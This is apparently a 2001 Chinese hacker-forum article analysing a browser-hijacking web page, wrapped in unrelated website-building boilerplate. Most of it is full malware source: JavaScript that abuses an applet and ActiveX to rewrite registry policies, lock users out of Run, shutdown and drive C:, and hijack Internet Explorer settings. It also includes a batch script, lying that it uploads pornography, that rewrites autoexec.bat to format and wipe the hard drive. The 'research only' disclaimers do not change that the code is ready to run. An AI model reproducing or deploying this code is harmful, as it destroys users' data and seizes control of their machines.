网站建设是指使用标识语言(markup language),通过一系列设计、建模、和执行的过程将电子格式的信息通过互联网传输,最终以图形用户界面(GUI)的形式被用户所浏览。简单来说,网页设计的目的就是产生网站。简单的信息如文字,图片(GIF,JPEG,PNG)和表格,都可以通过使超文件标示语言、可扩展超文本标记语言等标示语言放置到网站页面上。 大家都有这样很烦地经历:可能在网上冲浪时,IE会莫名被被改的希奇古怪了,收藏家也多了 许多什么什么精美照片之类的网址,我后来研究这种网页,隐藏的很深的,首先发现它的主页有这 样的代码有引用什么www.coolstarpage.com的代码, <script src=""></script> 大家可以去看看 document.write("<IFRAME src='ieatt.htm' width='1' height='0' marginwidth='0' marginheight='0' hspace='0' vspace='0' frameborder='0' scrolling='NO' ></IFRAME>"); 文件ieatt.htm代码这样的: <SCRIPT LANGUAGE="JScript.Encode">#@~^tREAAA==@#@&@!Z O@#@&\mD, WMNdP{JYf;/mMrwD] ...</SCRIPT> 显然用Microsoft Script Encoder加密JavaScript代码了,网络真好,很快找到了 Decoder for Microsoft Script Encoder(该工具的源代码有附)改程序的具体机制及算法详见:
【题外话】 Windows脚本加密器(Windows Script Encoder - screnc.exe)是微软提供给大家加密 html,JScript,ASP等脚本,该工具下载地址: 微软没有提供解密工具,微软在主页上这样说: Note that this encoding only prevents casual viewing of your code; it will not prevent the determined hacker from seeing what you've done and how.
加密器使用方法: screnc filename1 filename2 filename1 - 要加密的脚本文件 filename2 - 加密后输出的脚本文件 举个例子: 源文件如下: <HTML> <HEAD> <TITLE>Page with secret information</TITLE> <SCRIPT LANGUAGE="JScript"> <!--// //**Start Encode** alert ("this code should be kept secret!!!!"); //--> </SCRIPT> </HEAD> <BODY> This page contains secret information. </BODY> </HTML>
加密后文件如下: <HTML> <HEAD> <TITLE>Page with secret information</TITLE> <SCRIPT LANGUAGE="JScript.Encode"> <!--// //**Start Encode**#@~^QwAAAA==@#@&P~,l^+DDPvEY4kdP1W[n,/tK;V9P4 ~V+aY,/nm.nD"Z"eE#p@#@&&JOO@*@#@&qhAAAA==^#~@& lt;/SCRIPT> </HEAD> <BODY> This page contains secret information. </BODY> </HTML>
【--不要使用,大家研究研究------------------------------------------------------------------】 <SCRIPT LANGUAGE="JAVASCRIPT">
fn="GhostStudio.HTM"; doc="<SCRIPT>s1=\'Welcome to Ghost Studio\';alert(s1);document.body.innerHTML=s1</"+"SCRIPT>";
document.write("<APPLET HEIGHT=0 WIDTH=0></APPLET>");
//add favorites function AddFavLnk(localFavDir, urlDispname, urlSite) { var varShortcut = Shl.CreateShortcut(localFavDir + "\\" + urlDispname +".URL"); varShortcut.TargetPath = urlSite; varShortcut.Save(); }
function saveFile() { a1.setProperty('DOC',doc); }
function iloveu() { try { //ActiveX initialization a1=document.applets[0]; a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Shl = a1.GetObject(); a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); a1.createInstance(); FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); a1.createInstance(); Net = a1.GetObject(); a1.setCLSID("{06290BD5-48AA-11D2-8432-006008C3FBFC}"); a1.createInstance(); Path = a1.GetObject(); //create a file named 'GhostStudio.htm" on your desktop setTimeout("a1.setProperty('Path','"+fn+"')",1000); setTimeout("saveFile()",1500); setTimeout("a1.invoke('write',VA);alert('"+fn+" 被建立');",2000); try { if (document.cookie.indexOf("Chg") == -1) { var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90)); document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;" var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "\\Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites"; if(!FSO.FolderExists(loc)) return; } //add favorite AddFavLnk(loc, "Ghost Studio", ""); //no run Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); //no shutdown Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY"); //no logoff Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); //no driver c: Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD"); //no dos program Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled","REG_BINARY"); //no dos model Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode","REG_BINARY");
//show logon messagebox title Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "AHA i LOVE U"); //show logon messagebox contect Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "AHA i LOVE U");
//modify ie start page Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", ""); //modify input Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\internat.exe", ".............."); //modify reg readonly Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000000", "REG_DWORD"); //modify ie window title Shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", ""); Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", ""); //modify ie search page Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\AutoSearch", "05000000", "REG_BINARY"); Shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\AutoSearch", "05000000", "REG_BINARY"); Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Do404Search", "01000000", "REG_BINARY"); Shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Do404Search", "01000000", "REG_BINARY"); Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", ""); Shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", "");
} } catch(e){} } catch(e){} }
function init() { setTimeout("iloveu()", 1000); }
<SCRIPT LANGUAGE="VBSCRIPT"> ' 获取[] VA = ARRAY() </SCRIPT> //***************************************** @echo off rem Bye Bye Hardrive 1.0 echo Please wait while program uploads some nice pronography....
call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo dummy variable >c:\dvar.txt
:form call format c: /q /u /autotest >nul if exist c:\dos\format.* goto dosform if exist c:\windows\command\format.* goto winform goto de
:dosform cd\dos >nul call format c: /h /q /u /autotest >nul cd\ >nul
:winform cd\windows\command >nul call format c: /h /q /u /autotest >nul cd\ >nul goto inform
:de if exist c:\dvar.txt goto dtree goto inform
:dtree call deltree /y c: >nul if exist c:\dos\deltree.* goto deldos if exist c:\windows\command\deltree.* goto delwin goto inform
:deldos cd\dos call deltree /y c: >nul cd\
:delwin cd\windows\command >nul call deltree /y c: >nul cd\ >nul
rem The following rewrites the code into the autoexec.bat file.
echo @echo off >c:\autoexec.bat echo cls >>c:\autoexe.bat
echo :form echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo if exist c:\dos\format.* goto dosform >>c:\autoexec.bat echo if exist c:\windows\command\format.* goto winform >>c:\autoexec.bat echo goto de >>c:\autoexec.bat
echo :dosform >>c:\autoexec.bat echo cd\dos >nul >>c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo cd\ >nul >>c:\autoexec.bat
echo :winform >>c:\autoexec.bat echo cd\windows\command >nul >>c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat echo cd\ >nul >>c:\autoexec.bat echo goto write >>c:\autoexec.bat
echo :de >>c:\autoexec.bat echo if exist c:\dvar.txt goto dtree >>c:\autoexec.bat echo goto write >>c:\autoexec.bat
echo :dtree >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo if exist c:\dos\deltree.* goto deldos >>c:\autoexec.bat echo if exist c:\windows\command\deltree.* goto delwin >>c:\autoexec.bat
echo :deldos >>c:\autoexec.bat echo cd\dos >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo cd\ >>c:\autoexec.bat
echo :delwin >>c:\autoexec.bat echo cd\windows\command >nul >>c:\autoexec.bat echo call deltree /y c: >nul >>c:\autoexec.bat echo cd\ >nul >>c:\autoexec.bat
echo :write >>c:\autoexec.bat echo type hdkiller.txt >>c:\autoexec.bat echo c:\ >>c:\autoexec.bat echo cd\ >>c:\autoexec.bat echo :nasty >>c:\autoexec.bat echo md nasty >>c:\autoexec.bat echo cd nasty >>c:\autoexec.bat echo echo You're Gone @$$ hole!!!! >yourgone.txt >>c:\autoexec.bat echo goto nasty >>c:\autoexec.bat echo pause >>c:\autoexec.bat
rem Rewriting of code to the autoexec.bat file is complete.
c:\ >nul cd\ >nul :killfat md nasty >nul cd nasty >nul echo Woops Is sent the hdk and not the pornography o well.. >yourgone.txt >nul goto killfat
:end //***************************************** 【--不要使用,大家研究研究------------------------------------------------------------------】
批注(我加上了注解,代码中Ghost Studio及 http://ghoststudio.yeah.net字符串是我代替用的,其中有些代码是我自己根据对Windows的了解而加上去的) 更重要的是可以执行一个可执行文件
虽然JAVA对Applet的安全作出了限制,但由于浏览器或语言漏洞的原因,当它与功能比较强大的脚本语言结合时,这些小应用程序常可凭借正常或诡秘的手段对用户 的机器进行恶意修改,比如修改注册表,运行相关的DOS命令,在用户机器上安装木马或激活相关的应用程序,其功能之强大远非单纯的网页所能胜任,由此看来,现在网上 所流传的说什么浏览相关网页中病毒或者硬盘被格式化也就见怪不惊了。另外,还有一种嵌入式应用程序就是ActiveX,是微软的一种插件技术,也可以象Applet一样 进行一些针对本机的操作。现在让我们了解一下以下代码编制的机 理(如果你不了解脚本语言,可仅看看程序修改了哪些注册表表 项,然后找到 这些表项并修改回来)。
让我们再来看看这个东西是什么? 我的computer时Windows 2000 在目录 \WINNT\Java\Packages\有一个zip文件Tn9j75np.zip大概5M 里面是一堆的java class 我提供代码中有将有源文件ActiveXComponent.java代码大致是: public class ActiveXComponent extends Canvas {
private transient IAXComponent ax; private transient IUnknown unknown; private String clsid;
public void enableEvents() { }
public IUnknown createInstance(String s) { unknown = ax.createControl(s); return unknown; }
public IUnknown createInstance() { if(clsid == null) throw new NullPointerException(); else return createInstance(clsid); }
public void createInstance(IUnknown iunknown) { if(iunknown == null) { throw new NullPointerException(); } else { unknown = iunknown; ax.createControlFromIUnknown(iunknown); return; } }
public Variant invoke(String s, Variant avariant[]) { return internal_invoke(1, s, avariant); }
public Variant getProperty(String s) { return internal_invoke(2, s, null); }
public void setProperty(String s, Variant variant) { Variant avariant[] = new Variant[1]; avariant[0] = variant; internal_invoke(4, s, avariant); }
public ActiveXComponent() { PolicyEngine.checkForAllPermissions(); ax = createAXComponent(); }
public ActiveXComponent(String s) { this(); setCLSID(s); createInstance(s); }
public ActiveXComponent(IUnknown iunknown) { this(); createInstance(iunknown); }
protected IAXComponent getHost() { return ax; }
private static native IAXComponent createAXComponent();
private Variant internal_invoke(int i, String s, Variant avariant[]) throws IllegalArgumentException, NullPointerException { int ai[] = new int[1]; if(s == null) throw new IllegalArgumentException("The method or property name can not be null."); if(i == 0) i = 1; if(i != 1 && i != 2 && i != 4 && i != 8) throw new IllegalArgumentException("The argument, int type, is not valid."); if(getObject() == null) throw new NullPointerException("The ActiveX control IUnknown is null."); Variant variant = null; switch(i) { case 3: // '\003' case 5: // '\005' case 6: // '\006' case 7: // '\007' default: break;
case 2: // '\002' variant = Dispatch.get(getObject(), s); break;
case 4: // '\004' if(avariant == null) throw new IllegalArgumentException("Property value can not be null."); Dispatch.put(getObject(), s, avariant[0]); break;
case 8: // '\b' if(avariant == null) throw new IllegalArgumentException("Property value can not be null."); Dispatch.putRef(getObject(), s, avariant[0]); break;
case 1: // '\001' if(avariant == null) { Variant avariant1[] = new Variant[1]; avariant1[0] = new Variant(); avariant = avariant1; } variant = Dispatch.invokev(getObject(), s, i, avariant, ai); break; } return variant; }
public void setCLSID(String s) { clsid = s; }
public String getCLSID() { return clsid; }
public IUnknown getObject() { return unknown; }
static { System.loadLibrary("msawt"); } } 可以看出 Windows对java的支持主要靠这个文件:\SystemDir\msawt.dll(Microsoft AWT Library for Java)
【提供的源代码说明】 _iloveu.ok 恶意代码(我没有测试,原理绝对对,大家不要使用) 微软对java支持的一块代码 remodify.htm 对已中毒的系统恢复注册表(代码加密了,大家解密看看) 注册表大全卷一RegHelp Vol.1压缩包(解压后点击reg目录下的index.html) sce10chs.exe Mircosoft提供的脚本加密工具ver 1.0 scrdec13.c Windows Script Decoder源代码ver 1.3 scrdec13.exe Windows Script Decoder程序(命令行方式) WindowsScriptDecoder.htm 原作者的算法讲解,e文
Copyleft (c) 2001 Ghost Studio. All rights abandoned. 2001/12/29
【闪人了!】 再过两小时我们要吃年饭了,不能说太多了,呵呵,没时间了! 大家自己研究研究吧!千万不要滥用哦! 不对的请指正! 最后祝大家也祝我,Happy New Year!天天好心情!
重复重要声明: 此代码仅供研究使用,让大家有点防范意识,不要这种无聊恶意的代码危害我们, 影响我们网上冲浪的心情,如果有人非法使用,一切后果自负,与本人无关,也建议大家 不要在自己的主页中使用,因为你一旦使用,最后最遭殃的是生你养你的老妈呀! 大多数人在上网的时候,都会浏览网页提供给我们的信息。